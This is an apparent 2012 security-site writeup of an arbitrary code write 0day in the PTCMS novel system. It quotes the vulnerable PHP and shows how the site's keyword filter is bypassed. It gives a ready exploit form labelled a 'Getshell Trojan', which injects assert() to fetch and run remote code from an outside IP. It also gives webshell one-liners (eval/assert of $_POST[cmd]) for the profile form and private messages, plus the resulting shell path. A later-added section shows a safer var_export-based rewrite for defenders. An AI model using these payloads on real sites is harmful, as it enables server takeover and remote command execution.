ptcms (PT novel thief / PTNovelSteal) arbitrary code write 0day vulnerability warning - the black bar safety net

2012-01-22T00:00:00
ID MYHACK58:62201232958
Type myhack58
Reporter 佚名
Modified 2012-01-22T00:00:00

Description

This hits every version of the PT novel system. But the vendor has already released a patch! (What a game!)

OK, the writeup starts here:

This program does not keep users in the database; all user information is saved under the /data/user directory!

A folder is created per username, and the registration parameters and user information are written into it.

The code elsewhere looks much the same, so we only look at one representative file:

/user/reg4.php

if (isset($_POST['dosubmit'])){
    unset($_POST['dosubmit']);
}else{
    echo "<script>alert('route incorrect!');location.href='reg.php';</script>";
    exit();
}

include '../inc/global.php';
include '../data/user.php';

$username=$_POST['username'];

// Write data and information
$str='<?php'."\n";
foreach($_POST as $key => $value){
    // every POST key becomes a variable name and every value its content, with no escaping at all
    $str.="\$$key='$value';\n";
}
$str.="\$regdate='".date("Y-m-d")."';\n";
$str.="?>";
$file='../data/user/'.$username.'/info.php';   // username also goes straight into the path
$result=$pt->writeto($file,$str);   // method name as rendered in the source; the original identifier was mangled in translation

...... Omitted

In the code above I kept only the most critical part. Now look at our lovely foreach.

The POST values are passed straight into the write function. See the code:

Common.class.php

// Generate the html
function writeto($filePath, $content){
    pt::createdir(dirname($filePath));
    $pt_html = fopen($filePath, 'w');
    flock($pt_html, LOCK_EX);
    $result = fwrite($pt_html, $content);
    fclose($pt_html);
    return $result;
}

// Build directory
function createdir($dir){
    if (strpos('\\',$dir)){   // note: strpos() takes (haystack, needle); the arguments here are reversed
        $dir=str_replace('\\','/',$dir);
    }
    $edir = explode("/",$dir);
    for($i=0;$i<count($edir);$i++){
        $edirm = $edir[0];
        for($ii=1;$ii<=$i;$ii++){
            $edirm = $edirm.'/'.$edir[$ii];
        }
        if(file_exists($edirm) && is_dir($edirm)){
        }else{
            @mkdir($edirm,0777);   // each missing path component is created world-writable
        }
    }
}

The magic: the content is written straight into a PHP file. OK, now let's see how it is used.

First, the "route" check can simply be ignored. This file has no filter function of its own, so let's look at the file it includes.

global.php

// Prevent illegal POST
if (!empty($_REQUEST)){
    $value=implode(" ",$_REQUEST);
    // the patch only added keywords here; of course the vendor never found the bypass this vulnerability uses
    if(preg_match("/\{|\}|fputs|fopen|base64|eval/i", $value)){
        exit('illegal');
    }
}

Unrelated code omitted. As you can see, global.php only has a simple filter, which is easily bypassed.

For the method of use, see my EXP:
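As an added example (not PTCMS code), here is how the write in reg4.php could be done safely: the filter above joins only the values of $_REQUEST, so POST keys are never inspected, and the real fix is to stop generating PHP from user input at all by whitelisting the fields, emitting them with var_export(), and restricting the username so it cannot shape the file path. ALLOWED_FIELDS and the function names are assumptions made for this example.

```php
<?php
// Added example, not PTCMS code: a hardened replacement for the write in reg4.php.
// ALLOWED_FIELDS is a hypothetical list; use the fields the real form needs.
const ALLOWED_FIELDS = ['username', 'email', 'nickname'];

// Only accept a username from a strict character set, so the value can never
// contain '/', '..' or quotes and cannot steer the path outside $baseDir.
function safe_profile_path(string $baseDir, string $username): string
{
    if (!preg_match('/^[A-Za-z0-9_]{3,20}$/', $username)) {
        throw new InvalidArgumentException('invalid username');
    }
    return rtrim($baseDir, '/') . '/' . $username . '/info.php';
}

// Emit the whitelisted fields as a PHP literal. Unknown keys (the original
// interpolated every POST key as a variable name) are dropped, and var_export()
// escapes every string, so a value containing a closing PHP tag and more code
// stays inside the quotes and is data, not code.
function build_profile_file(array $post): string
{
    $data = [];
    foreach (ALLOWED_FIELDS as $field) {
        if (isset($post[$field]) && is_string($post[$field])) {
            $data[$field] = $post[$field];
        }
    }
    $data['regdate'] = date('Y-m-d');
    return "<?php\nreturn " . var_export($data, true) . ";\n";
}

// Constructed request shaped like the one this page describes: a code-bearing
// key and a quote-breaking value. Both end up harmless in the output.
$post = [
    'username'         => 'alice',
    'nickname'         => "'?><?php echo 1;?><?php'",
    'exp;assert(1);//' => 'x',
];
$path = safe_profile_path('../data/user', $post['username']);
echo $path, "\n";
echo build_profile_file($post);
// Later, the profile is loaded with: $profile = include $path;
```

Storing the profile as JSON in a non-.php file under a directory the web server does not execute would remove the code-generation step entirely; the var_export() form is shown because it keeps the program's existing include-based loading.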

<title>PT the novel system Getshell Trojan by cfking</title>
<form id="QuickSearch" action="" method="post" name="QuickSearch" onsubmit="addaction();">
Destination address:<input style="width: 400;" type="text" name="doaction" value="http://localhost/user/reg4.php" />
<input style="width: 400;" type="hidden" name="dosubmit" value="test" />
Registration account:<input style="width: 400;" type="text" name="cfking" value="username" />
Remote code:<input style="width: 400;" type="text" name="url" value="http://110.110.110.110/xx.txt" />
<input style="width: 400;" type="hidden" name="exp;assert(file_get_contents($url));//" />
<input type="submit" name="QuickSearchBtn" value="submit" style="font-size:16px;"/>
</form>
<script type="text/javascript">
function addaction()
{
    document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
<hr><p>tips: after success the shell path is /data/user/username/info.php. Damn, this is too powerful! Roar roar!</p>
Remote code: fill the TXT file with: eval($_POST[cmd]);
<p><p>
welcome to <a href="http://www.90sec.org/" title="90sec information security team">www.90sec.org</a><hr>

Another method:

Register an account, then in the "modify personal data" form insert

'?><?php assert($_POST[cmd]);?><?php'

The shell path is /data/user/username/info.php.

But this fails if GPC (magic_quotes_gpc) is on, so here is another one I found:

Send a private message and write the following in the title or content:

<?php assert($_POST[cmd]);?>

It works directly.

Address: pm.php